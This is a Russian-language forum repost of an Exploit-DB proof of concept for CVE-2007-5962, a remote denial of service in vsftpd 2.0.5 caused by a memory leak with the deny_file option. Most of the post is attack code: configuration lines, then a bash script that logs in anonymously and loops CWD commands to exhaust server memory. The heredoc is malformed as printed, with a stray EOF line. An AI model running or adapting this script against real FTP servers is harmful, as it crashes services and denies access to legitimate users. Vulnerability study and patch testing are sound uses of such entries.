Exploit vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31818
Проверка EDB
  1. Пройдено
Автор
MARTIN NAGY
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-5962
Дата публикации
2008-05-21
Код:
source: https://www.securityfocus.com/bid/29322/info


The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. 

# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
# service vsftpd restart

$ cat > memtest.sh <<EOF
 EOF
#!/bin/bash
echo USER anonymous
echo PASS [email protected]

while [ 1 ]; do
        echo CWD pub
        echo CWD ..
done
EOF
 
Источник
www.exploit-db.com

Похожие темы